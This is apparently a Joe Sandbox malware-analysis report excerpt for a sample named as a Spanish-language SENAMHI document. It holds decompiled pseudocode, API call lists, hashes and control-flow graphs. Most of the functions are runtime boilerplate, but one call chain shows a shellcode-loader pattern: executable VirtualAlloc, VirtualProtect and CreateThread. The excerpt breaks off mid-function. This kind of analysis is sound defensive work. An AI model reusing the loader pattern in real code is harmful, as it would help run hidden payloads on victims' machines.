    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: 1344b648b820dde75b48654b36d41ab29421988322adf45d70e7eaa060216e02
    • Instruction ID: d4c04cc18ef3e904463d7f4cda7aeec2a6f5527890a5643edf67ec5aac405931
    • Opcode Fuzzy Hash: 1344b648b820dde75b48654b36d41ab29421988322adf45d70e7eaa060216e02
    • Instruction Fuzzy Hash: 440126B2608316EFC7208F68D8C19DDFB98EB053B5F140629EA65BB6C0D3706C15CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 93 159e27-159e32 94 159e34-159e3e 93->94 95 159e40-159e46 93->95 94->95 96 159e74-159e7f call 1575d4 94->96 97 159e5f-159e70 RtlAllocateHeap 95->97 98 159e48-159e49 95->98 102 159e81-159e83 96->102 99 159e72 97->99 100 159e4b-159e52 call 1588f3 97->100 98->97 99->102 100->96 106 159e54-159e5d call 15893e 100->106 106->96 106->97
    C-Code - Quality: 100%
    			E00159E27(signed int _a4, signed int _a8) {
    				void* _t8;
    				signed int _t13;
    				signed int _t18;
    				long _t19;
    
    				_t18 = _a4;
    				if(_t18 == 0) {
    					L2:
    					_t19 = _t18 * _a8;
    					if(_t19 == 0) {
    						_t19 = _t19 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0x292dc0, 8, _t19); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E001588F3();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E001575D4(__eflags))) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						__eflags = E0015893E(__eflags, _t19);
    						if(__eflags == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				if(_t13 / _t18 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00159246,00000001,00000364,00000006,000000FF,?,?,?,001575D9,0015116B), ref: 00159E68
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 5e4c5fbef02261cd56de7dfbfb27453dbf95f455ee8f15783507c629fc74b53b
    • Instruction ID: 0a676d773c0ad00448c5b8ebd71fa154e74608ba85db2b9ef68058ed708fd580
    • Opcode Fuzzy Hash: 5e4c5fbef02261cd56de7dfbfb27453dbf95f455ee8f15783507c629fc74b53b
    • Instruction Fuzzy Hash: 5EF0BE31605224E6DF22EB629C07B6F3749EB80762B194121EC39EE081EF20DC0986E3
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 109 153bdd-153be3 GetCommandLineA call 153a86 111 153be8-153bee 109->111 112 153d14-153d1c call 157188 111->112 113 153bf4 111->113 113->112
    C-Code - Quality: 84%
    			E00153BDD(intOrPtr* __ecx) {
    				void* _t3;
    				intOrPtr* _t5;
    
    				_t5 = __ecx;
    				GetCommandLineA(); // executed
    				E00153A86(); // executed
    				asm("int3");
    				_t3 = _t5 + 4;
    				if( *_t5 != _t3) {
    					return E00157188( *_t5);
    				} else {
    					return _t3;
    				}
    			}

    APIs
    • GetCommandLineA.KERNEL32 ref: 00153BDD
      • Part of subcall function 00153A86: VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00153AF0
      • Part of subcall function 00153A86: VirtualProtect.KERNELBASE(74317E90,00000100,00000040,00000000), ref: 00153B0F
      • Part of subcall function 00153A86: CreateThread.KERNELBASE(00000000,00000000,74317E90,00000000,00000000,00000000), ref: 00153B46
      • Part of subcall function 00153A86: MessageBoxA.USER32 ref: 00153B82
      • Part of subcall function 00153A86: MessageBoxA.USER32 ref: 00153B99
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: MessageVirtual$AllocCommandCreateLineProtectThread
    • String ID:
    • API String ID: 1227410803-0
    • Opcode ID: 598549ed8e367672428f69b10c997abec1a540e18c3f27856c6da7621ef1a875
    • Instruction ID: ce194d220985796bffd662f187f51636374639f1d6f3c6e88ebb8541a2515e9e
    • Opcode Fuzzy Hash: 598549ed8e367672428f69b10c997abec1a540e18c3f27856c6da7621ef1a875
    • Instruction Fuzzy Hash: 19C04C74015504EBCB056B74D84545477B6BFA138B7F440EDF5328E871DB324A9ADE10
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00151B39(void* __ebx, intOrPtr __ecx, struct HINSTANCE__* __edi, void* __esi, void* __eflags) {
    				CHAR* _t55;
    				void* _t63;
    				intOrPtr _t64;
    				CHAR* _t65;
    				struct HRSRC__* _t67;
    				struct HINSTANCE__* _t68;
    				void* _t69;
    				CHAR* _t75;
    				struct HINSTANCE__* _t83;
    				void* _t89;
    				struct HINSTANCE__* _t111;
    				void* _t112;
    				void* _t113;
    				intOrPtr _t115;
    
    				_t109 = __edi;
    				_push(0x428);
    				E00160282(0x16083d, __ebx, __edi, __esi);
    				_t89 = 0;
    				_t55 =  *(_t112 + 8);
    				_t111 = 0;
    				 *(_t112 - 0x42c) =  *(_t112 + 0xc);
    				 *(_t112 - 0x41c) = _t55;
    				 *(_t112 - 0x428) =  *(_t112 + 0x10);
    				 *(_t112 - 0x424) = 0;
    				 *((intOrPtr*)(_t112 - 4)) = 0;
    				 *((intOrPtr*)(_t112 - 0x430)) = __ecx;
    				 *((intOrPtr*)(_t112 - 0x434)) = 0;
    				 *(_t112 - 0x418) = 0;
    				 *((char*)(_t112 - 4)) = 1;
    				if(_t55 == 0) {
    					L30:
    					__eflags = _t89 - _t112 - 0x414;
    					if(_t89 != _t112 - 0x414) {
    						E00153D14(_t112 - 0x418);
    					}
    					__eflags = _t111;
    					if(_t111 != 0) {
    						do {
    							_t109 = _t111->i;
    							_t111 = _t109;
    							E00157188(_t111);
    							__eflags = _t109;
    						} while (_t109 != 0);
    					}
    				} else {
    					 *(_t112 - 0x420) = E001575E7(_t55) + 1;
    					_t63 = E00151181(_t112 - 0x420, E001575E7(_t55) + 1);
    					_t115 = _t113 + 4;
    					if(_t63 < 0) {
    						L29:
    						_t89 =  *(_t112 - 0x418);
    						goto L30;
    					} else {
    						_t109 =  *(_t112 - 0x420);
    						_t120 = _t109 - 0x400;
    						if(_t109 > 0x400 || E001511AE(0, _t109, _t109, 0, _t120) == 0) {
    							_t64 = E00153CD7(_t112 - 0x424, _t111, _t109);
    							_t111 =  *(_t112 - 0x424);
    						} else {
    							E001602F0(_t109);
    							 *((intOrPtr*)(_t112 - 0x10)) = _t115;
    							_t64 = _t115;
    						}
    						_t65 = E00151251(_t64,  *(_t112 - 0x41c), _t109, 3);
    						 *(_t112 - 0x41c) = _t65;
    						if(_t65 == 0) {
    							goto L29;
    						} else {
    							_t109 = LoadLibraryExA(_t65, _t89, 0x60);
    							 *(_t112 - 0x420) = _t109;
    							if(_t109 != 0) {
    								L10:
    								_t67 = FindResourceA(_t109,  *(_t112 - 0x42c),  *(_t112 - 0x428));
    								 *(_t112 - 0x42c) = _t67;
    								__eflags = _t67;
    								if(_t67 != 0) {
    									_t68 = LoadResource(_t109, _t67);
    									 *(_t112 - 0x428) = _t68;
    									__eflags = _t68;
    									if(_t68 == 0) {
    										goto L11;
    									} else {
    										_t75 = SizeofResource(_t109,  *(_t112 - 0x42c));
    										 *(_t112 - 0x41c) = _t75;
    										_t30 =  &(_t75[1]); // 0x1
    										_t98 = _t30;
    										__eflags = _t30 - _t75;
    										if(_t30 >= _t75) {
    											 *((char*)(_t112 - 4)) = 2;
    											__eflags = E00153D42(_t98) - 0x400;
    											if(__eflags <= 0) {
    												 *(_t112 - 0x418) = _t112 - 0x414;
    											} else {
    												E00153D1D(_t112 - 0x418, _t111, __eflags, _t76);
    											}
    											 *((intOrPtr*)(_t112 - 4)) = 1;
    											__eflags =  *(_t112 - 0x418);
    											if( *(_t112 - 0x418) == 0) {
    												goto L14;
    											} else {
    												E00151285(E00151105( *(_t112 - 0x418),  *(_t112 - 0x41c),  *(_t112 - 0x428),  *(_t112 - 0x41c)));
    												 *( *(_t112 - 0x418) +  *(_t112 - 0x41c)) = _t89;
    												_t69 = E00152C50(_t89, _t112 - 0x434,  *(_t112 - 0x41c), __eflags,  *(_t112 - 0x418),  *((intOrPtr*)(_t112 + 0x14)));
    												goto L21;
    											}
    										} else {
    											L14:
    											_t89 = 0x8007000e;
    										}
    									}
    								} else {
    									L11:
    									_t69 = E001512C0();
    									L21:
    									_t89 = _t69;
    								}
    								__eflags = _t109;
    								if(_t109 != 0) {
    									FreeLibrary(_t109);
    								}
    							} else {
    								_t83 = LoadLibraryExA( *(_t112 - 0x41c), _t89, 2);
    								_t109 = _t83;
    								 *(_t112 - 0x420) = _t83;
    								if(_t109 != 0) {
    									goto L10;
    								} else {
    									_t89 = E001512C0();
    								}
    							}
    							if( *(_t112 - 0x418) != _t112 - 0x414) {
    								E00153D14(_t112 - 0x418);
    							}
    							if(_t111 != 0) {
    								do {
    									_t109 = _t111->i;
    									_t111 = _t109;
    									E00157188(_t111);
    								} while (_t109 != 0);
    							}
    						}
    					}
    				}
    				return E001601D4(_t89, _t109, _t111);
    			}

    APIs
    • __EH_prolog3_catch_GS.LIBCMT ref: 00151B43
    • __alloca_probe_16.LIBCMT ref: 00151BCE
    • LoadLibraryExA.KERNEL32(00000000,00000000,00000060,?,?,?,?,?), ref: 00151C0E
    • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00151C29
      • Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1
    • FindResourceA.KERNEL32(00000000,?,?), ref: 00151C54
    • LoadResource.KERNEL32(00000000,00000000), ref: 00151C70
    • SizeofResource.KERNEL32(00000000,?), ref: 00151C87
    • FreeLibrary.KERNEL32(00000000), ref: 00151D48
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: LibraryLoadResource$__alloca_probe_16$FindFreeH_prolog3_catch_Sizeof
    • String ID: 0Xv@hv
    • API String ID: 2027223938-821520770
    • Opcode ID: fe23d1d87027a50f6ec40f5f5eb4210a31a969296b9fb58005229fd9c5c9b447
    • Instruction ID: 5be1d29982fe879dea3c27f73d54bb78326dc868fd7a2dca692e3c1772114175
    • Opcode Fuzzy Hash: fe23d1d87027a50f6ec40f5f5eb4210a31a969296b9fb58005229fd9c5c9b447
    • Instruction Fuzzy Hash: 506163B1A40218EBCB229F64CC847ED77B5AF58301F5440E9EE29AB241DB709EC9CF55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E001571A3(void* __edx) {
    				signed int _v8;
    				char _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				long _v24;
    				struct _MEMORY_BASIC_INFORMATION _v52;
    				struct _SYSTEM_INFO _v88;
    				void* _v100;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t18;
    				void* _t20;
    				void* _t22;
    				long _t23;
    				char _t24;
    				long _t30;
    				signed int _t37;
    				void* _t41;
    				void* _t42;
    				signed int _t44;
    				long _t46;
    				char _t47;
    				signed int _t50;
    				void* _t51;
    
    				_t41 = __edx;
    				_t18 =  *0x169008; // 0x26a91022
    				_v8 = _t18 ^ _t50;
    				_t20 = 4;
    				E001602C0(_t20);
    				_t22 = _t51;
    				_v16 = _t22;
    				_t23 = VirtualQuery(_t22,  &_v52, 0x1c);
    				_t53 = _t23;
    				if(_t23 == 0) {
    					L12:
    					_t24 = 0;
    					__eflags = 0;
    				} else {
    					_v20 = _v52.AllocationBase;
    					GetSystemInfo( &_v88);
    					_t37 = _v88.dwPageSize;
    					_t47 = 0;
    					_v12 = 0;
    					if(E00159A78(_t53,  &_v12) != 0 && _v12 > 0) {
    						_t47 = _v12;
    					}
    					_t44 =  ~_t37;
    					_t46 = _t47 - 0x00000001 + _t37 & _t44;
    					if(_t46 != 0) {
    						_t46 = _t46 + _t37;
    					}
    					_t30 = _t37 + _t37;
    					if(_t46 < _t30) {
    						_t46 = _t30;
    					}
    					_t42 = (_t44 & _v16) - _t46;
    					if(_t42 < _v20 + _t37 || VirtualAlloc(_t42, _t46, 0x1000, 4) == 0 || VirtualProtect(_t42, _t46, 0x104,  &_v24) == 0) {
    						goto L12;
    					} else {
    						_t24 = 1;
    					}
    				}
    				return E0015403C(_t24, _t37, _v8 ^ _t50, _t41, _t42, _t46);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 001571CC
    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 001571E0
    • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 00157230
    • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 00157245
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: Virtual$AllocInfoProtectQuerySystem
    • String ID:
    • API String ID: 3562403962-0
    • Opcode ID: d975abb2164b529ef5e1a58f6a7e35f8ebf018f20572f2f75cb175e929f8d013
    • Instruction ID: 669127ac250a66cb13c405502ccb2bd4ee9963159db08caf3b253dc20eacdbc3
    • Opcode Fuzzy Hash: d975abb2164b529ef5e1a58f6a7e35f8ebf018f20572f2f75cb175e929f8d013
    • Instruction Fuzzy Hash: BB219572E00118EBCB20DBE5AC86AEFB7B8EF44755F050465FD26EB180D7749948C6A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00154959(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
    				char _v0;
    				struct _EXCEPTION_POINTERS _v12;
    				intOrPtr _v80;
    				intOrPtr _v88;
    				char _v92;
    				intOrPtr _v608;
    				intOrPtr _v612;
    				void* _v616;
    				intOrPtr _v620;
    				char _v624;
    				intOrPtr _v628;
    				intOrPtr _v632;
    				intOrPtr _v636;
    				intOrPtr _v640;
    				intOrPtr _v644;
    				intOrPtr _v648;
    				intOrPtr _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				intOrPtr _v664;
    				intOrPtr _v668;
    				char _v808;
    				char* _t39;
    				long _t49;
    				intOrPtr _t51;
    				void* _t54;
    				intOrPtr _t55;
    				intOrPtr _t57;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				intOrPtr* _t60;
    
    				_t59 = __esi;
    				_t58 = __edi;
    				_t57 = __edx;
    				if(IsProcessorFeaturePresent(0x17) != 0) {
    					_t55 = _a4;
    					asm("int 0x29");
    				}
    				E00154B51(_t34);
    				 *_t60 = 0x2cc;
    				_v632 = E00155210(_t58,  &_v808, 0, 3);
    				_v636 = _t55;
    				_v640 = _t57;
    				_v644 = _t51;
    				_v648 = _t59;
    				_v652 = _t58;
    				_v608 = ss;
    				_v620 = cs;
    				_v656 = ds;
    				_v660 = es;
    				_v664 = fs;
    				_v668 = gs;
    				asm("pushfd");
    				_pop( *_t15);
    				_v624 = _v0;
    				_t39 =  &_v0;
    				_v612 = _t39;
    				_v808 = 0x10001;
    				_v628 =  *((intOrPtr*)(_t39 - 4));
    				E00155210(_t58,  &_v92, 0, 0x50);
    				_v92 = 0x40000015;
    				_v88 = 1;
    				_v80 = _v0;
    				_t28 = IsDebuggerPresent() - 1; // -1
    				_v12.ExceptionRecord =  &_v92;
    				asm("sbb bl, bl");
    				_v12.ContextRecord =  &_v808;
    				_t54 =  ~_t28 + 1;
    				SetUnhandledExceptionFilter(0);
    				_t49 = UnhandledExceptionFilter( &_v12);
    				if(_t49 == 0 && _t54 == 0) {
    					_push(3);
    					return E00154B51(_t49);
    				}
    				return _t49;
    			}

    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00154965
    • IsDebuggerPresent.KERNEL32 ref: 00154A31
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00154A51
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00154A5B
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: 4844fbdaf0e264058503c5992c480b971a157048e3c52a5fb62f207ef10dfe63
    • Instruction ID: ca6c1e0e8d9ab10d1718b3268a9e81c28f5bac4bc5ced0a1580dcca568c0d650
    • Opcode Fuzzy Hash: 4844fbdaf0e264058503c5992c480b971a157048e3c52a5fb62f207ef10dfe63
    • Instruction Fuzzy Hash: 23311A75D41218DBDF10DFA4D989BCDBBF8AF08305F10419AE40DAB250EB709A888F45
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E001572E0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v0;
    				signed int _v8;
    				intOrPtr _v524;
    				intOrPtr _v528;
    				void* _v532;
    				intOrPtr _v536;
    				char _v540;
    				intOrPtr _v544;
    				intOrPtr _v548;
    				intOrPtr _v552;
    				intOrPtr _v556;
    				intOrPtr _v560;
    				intOrPtr _v564;
    				intOrPtr _v568;
    				intOrPtr _v572;
    				intOrPtr _v576;
    				intOrPtr _v580;
    				intOrPtr _v584;
    				char _v724;
    				intOrPtr _v792;
    				intOrPtr _v800;
    				char _v804;
    				struct _EXCEPTION_POINTERS _v812;
    				void* __edi;
    				signed int _t40;
    				char* _t47;
    				char* _t49;
    				intOrPtr _t60;
    				intOrPtr _t61;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				int _t67;
    				intOrPtr _t68;
    				signed int _t69;
    
    				_t68 = __esi;
    				_t65 = __edx;
    				_t60 = __ebx;
    				_t40 =  *0x169008; // 0x26a91022
    				_t41 = _t40 ^ _t69;
    				_v8 = _t40 ^ _t69;
    				if(_a4 != 0xffffffff) {
    					_push(_a4);
    					E00154B51(_t41);
    					_pop(_t61);
    				}
    				E00155210(_t66,  &_v804, 0, 0x50);
    				E00155210(_t66,  &_v724, 0, 0x2cc);
    				_v812.ExceptionRecord =  &_v804;
    				_t47 =  &_v724;
    				_v812.ContextRecord = _t47;
    				_v548 = _t47;
    				_v552 = _t61;
    				_v556 = _t65;
    				_v560 = _t60;
    				_v564 = _t68;
    				_v568 = _t66;
    				_v524 = ss;
    				_v536 = cs;
    				_v572 = ds;
    				_v576 = es;
    				_v580 = fs;
    				_v584 = gs;
    				asm("pushfd");
    				_pop( *_t22);
    				_v540 = _v0;
    				_t49 =  &_v0;
    				_v528 = _t49;
    				_v724 = 0x10001;
    				_v544 =  *((intOrPtr*)(_t49 - 4));
    				_v804 = _a8;
    				_v800 = _a12;
    				_v792 = _v0;
    				_t67 = IsDebuggerPresent();
    				SetUnhandledExceptionFilter(0);
    				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
    					_push(_a4);
    					_t57 = E00154B51(_t57);
    				}
    				return E0015403C(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
    			}

    APIs
    • IsDebuggerPresent.KERNEL32 ref: 001573D8
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001573E2
    • UnhandledExceptionFilter.KERNEL32(?), ref: 001573EF
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: e3278fb809357d35c09e4fd9140646650e8f520d177689d6d1caffda545f12d2
    • Instruction ID: b93d44965bbfb89fefb3f5d6a95992670ec7b1c74e1e6afa179b6b081bfa4387
    • Opcode Fuzzy Hash: e3278fb809357d35c09e4fd9140646650e8f520d177689d6d1caffda545f12d2
    • Instruction Fuzzy Hash: 1B31A475901228EBCB21DF64DD89BCDBBB8BF18311F5041DAE81CAB291E7709B858F45
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00157B8E(int _a4) {
    				void* _t14;
    
    				if(E00159DF6(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
    					TerminateProcess(GetCurrentProcess(), _a4);
    				}
    				E00157C13(_t14, _a4);
    				ExitProcess(_a4);
    			}

    APIs
    • GetCurrentProcess.KERNEL32(?,?,00157B8D,?,00000000,?,?,?,00159C0E), ref: 00157BB0
    • TerminateProcess.KERNEL32(00000000,?,00157B8D,?,00000000,?,?,?,00159C0E), ref: 00157BB7
    • ExitProcess.KERNEL32 ref: 00157BC9
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: f29f8517dd6dd5c849e8238124544669d909db5391179200c2748a9a8a9949c2
    • Instruction ID: ff2e6f948724ff74177e3d8f1acd3a2fd916d4e0eb96721a46bd7eada80bd0cf
    • Opcode Fuzzy Hash: f29f8517dd6dd5c849e8238124544669d909db5391179200c2748a9a8a9949c2
    • Instruction Fuzzy Hash: EBE04631004148EFCF212B54ED0AE983B29EB00342B044424FC28CA531CB79DDC5CA90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0015FA9C(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
    				signed int _t172;
    				signed int _t175;
    				signed int _t178;
    				signed int* _t179;
    				signed char _t193;
    				signed int _t196;
    				signed int _t200;
    				signed int _t203;
    				void* _t204;
    				void* _t207;
    				signed int _t210;
    				void* _t211;
    				signed int _t226;
    				unsigned int* _t241;
    				signed char _t243;
    				signed int* _t251;
    				unsigned int* _t257;
    				signed int* _t258;
    				signed char _t260;
    				long _t263;
    				signed int* _t266;
    
    				 *(_a4 + 4) = 0;
    				_t263 = 0xc000000d;
    				 *(_a4 + 8) = 0;
    				 *(_a4 + 0xc) = 0;
    				_t243 = _a12;
    				if((_t243 & 0x00000010) != 0) {
    					_t263 = 0xc000008f;
    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
    				}
    				if((_t243 & 0x00000002) != 0) {
    					_t263 = 0xc0000093;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
    				}
    				if((_t243 & 0x00000001) != 0) {
    					_t263 = 0xc0000091;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
    				}
    				if((_t243 & 0x00000004) != 0) {
    					_t263 = 0xc000008e;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
    				}
    				if((_t243 & 0x00000008) != 0) {
    					_t263 = 0xc0000090;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
    				}
    				_t266 = _a8;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
    				_t260 = E0015E06F(_a4);
    				if((_t260 & 0x00000001) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
    				}
    				if((_t260 & 0x00000004) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
    				}
    				if((_t260 & 0x00000008) != 0) {
